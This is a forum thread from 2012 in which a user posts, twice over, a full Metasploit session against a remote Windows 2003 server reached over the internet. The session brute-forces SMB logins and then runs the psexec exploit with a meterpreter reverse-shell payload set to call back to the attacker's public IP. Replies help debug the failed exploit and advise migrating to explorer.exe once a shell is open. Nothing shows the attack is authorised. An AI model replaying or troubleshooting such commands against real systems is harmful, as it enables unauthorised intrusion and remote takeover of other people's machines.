mbarakoda Posted October 10, 2012 Share Posted October 10, 2012 Target OS: Windows 2003 SP2 EN Target public ip : XX.XX.XX.XX Target Open port: 445 My OS: windows 7 My public ip : YY.YY.YY.YY my local ip: 192.168.2.42 my router SMC Due to the fact that the target is not on the same LAN, and the attach will be over the internet, i start with setting port forward from router settings as the following: Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42 I installed metasploit and start with checking if the credentials are valid or not by running scanner/smb/smb_login as following msf> use scanner/smb/smb_login msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX rhosts => XX.XX.XX.XX msf auxiliary(smb_login) > set smbuser root smbuser => root msf auxiliary(smb_login) > set smbpass password smbpass => password msf auxiliary(smb_login) > run [*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce [-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported. [-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE) [-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE) [*] Auth-User: "root" [+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed then after login successful, i try to use exploit/windows/smb/psexec to exploit the server by the following: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set rhost XX.XX.XX.XX rhost => XX.XX.XX.XX msf exploit(psexec) > set smbuser root smbuser => root msf exploit(psexec) > set smbpass password smbpass => password msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(psexec) > set lhost YY.YY.YY.YY lhost => YY.YY.YY.YY msf exploit(psexec) > set lport 4444 lport => 4444 msf exploit(psexec) > exploit [-] Handler failed to bind to YY.YY.YY.YY:4444 [*] Started reverse handler on 0.0.0.0:4444 [*] Connecting to the server... [*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'... [*] Uploading payload... [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0) but as you see the exploit failed although the credentials are valid and confirmed above, can you help me understand what's wrong on the above? Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted October 12, 2012 Share Posted October 12, 2012 It could be that the vulnerability is already patched. Quote Link to comment Share on other sites More sharing options...
digip Posted October 12, 2012 Share Posted October 12, 2012 [-] Handler failed to bind to YY.YY.YY.YY:4444 Whats running locally already on 4444? Also, what OS is the target? Windows, or Linux runnung SMB? User root on a windows box seems unlikely, where as I could see it on a linux machine running samba, which if you think about it, I don't think psexec works on linux as a payload, but I could be wrong.. If you got a shell popped, try migrating to a process like explorer.exe and then see where or what your commands are/can do. Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted October 16, 2012 Share Posted October 16, 2012 Target OS: Windows 2003 SP2 EN Target public ip : XX.XX.XX.XX Target Open port: 445 My OS: windows 7 My public ip : YY.YY.YY.YY my local ip: 192.168.2.42 my router SMC Due to the fact that the target is not on the same LAN, and the attach will be over the internet, i start with setting port forward from router settings as the following: Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42 I installed metasploit and start with checking if the credentials are valid or not by running scanner/smb/smb_login as following msf> use scanner/smb/smb_login msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX rhosts => XX.XX.XX.XX msf auxiliary(smb_login) > set smbuser root smbuser => root msf auxiliary(smb_login) > set smbpass password smbpass => password msf auxiliary(smb_login) > run [*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce [-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported. [-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE) [-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE) [*] Auth-User: "root" [+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed then after login successful, i try to use exploit/windows/smb/psexec to exploit the server by the following: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set rhost XX.XX.XX.XX rhost => XX.XX.XX.XX msf exploit(psexec) > set smbuser root smbuser => root msf exploit(psexec) > set smbpass password smbpass => password msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(psexec) > set lhost YY.YY.YY.YY lhost => YY.YY.YY.YY msf exploit(psexec) > set lport 4444 lport => 4444 msf exploit(psexec) > exploit [-] Handler failed to bind to YY.YY.YY.YY:4444 [*] Started reverse handler on 0.0.0.0:4444 [*] Connecting to the server... [*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'... [*] Uploading payload... [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0) but as you see the exploit failed although the credentials are valid and confirmed above, can you help me understand what's wrong on the above? I found something related to your problem, I don't know if you have seen it or not, but here's the URL. http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.